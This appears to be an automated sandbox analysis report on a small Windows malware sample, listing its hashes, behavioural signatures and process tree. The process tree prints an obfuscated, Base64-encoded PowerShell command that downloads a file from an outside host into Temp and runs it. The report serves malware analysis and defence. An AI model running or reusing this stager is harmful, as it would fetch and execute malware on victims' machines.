Analysis
-
max time kernel
119s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231023-en -
resource tags
arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system -
submitted
08-12-2023 02:35
Static task
static1
1 signatures
Behavioral task
behavioral1
Sample
2DFGVCXV.exe
Resource
win7-20231023-en
windows7-x64
5 signatures
150 seconds
General
-
Target
2DFGVCXV.exe
-
Size
5KB
-
MD5
35beb6bfc19b4f3f1a0163f52870394a
-
SHA1
211362d1784343a46988ca4eae79bb6d99d68d0b
-
SHA256
e593bbbea1e480fdd8018bdaf481ef9f76f6b7c8cf783603164633bb0f8b2979
-
SHA512
bd4dc84de924069bf0adc12136badba67c89af49bbe1692631f25c674bce0f2e33c49820f72da019b0a28fe5ab646a438371458ddfe3ddde722b7438f0c86b77
-
SSDEEP
96:Ende79bSCbn4KLZDe5RuNDZPgDtENtUqwUNGOuKGd3ojfrl:WO9bZbn4KLZD+0NDZcSNtUqwUgiGdS
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 5 2928 powershell.exe 6 2928 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2928 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2928 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
2DFGVCXV.exedescription pid process target process PID 2876 wrote to memory of 2928 2876 2DFGVCXV.exe powershell.exe PID 2876 wrote to memory of 2928 2876 2DFGVCXV.exe powershell.exe PID 2876 wrote to memory of 2928 2876 2DFGVCXV.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2DFGVCXV.exe"C:\Users\Admin\AppData\Local\Temp\2DFGVCXV.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdgBrACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AaQBtAGcALgBnAHUAaQBsAGQAZQBkAGMAZABuAC4AYwBvAG0ALwBDAG8AbgB0AGUAbgB0AE0AZQBkAGkAYQBHAGUAbgBlAHIAaQBjAEYAaQBsAGUAcwAvADEAYQAzADAAZAA5ADkAMwA0ADMAZgA0ADgANQBlADIAMAAxADkAYwA4AGQANQBiADUAMwA1ADgAZgBhAGIAOAAtAEYAdQBsAGwALgB6AGkAcAAnACwAIAA8ACMAbAB1AGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwByAGIAaAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB0AHkAZQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAyAEQARgBHAEQARgBFAFcALgBlAHgAZQAnACkAKQA8ACMAeQB6AHAAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdQBmAGkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHYAbgB4ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIARABGAEcARABGAEUAVwAuAGUAeABlACcAKQA8ACMAeABzAGUAIwA+AA=="2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2928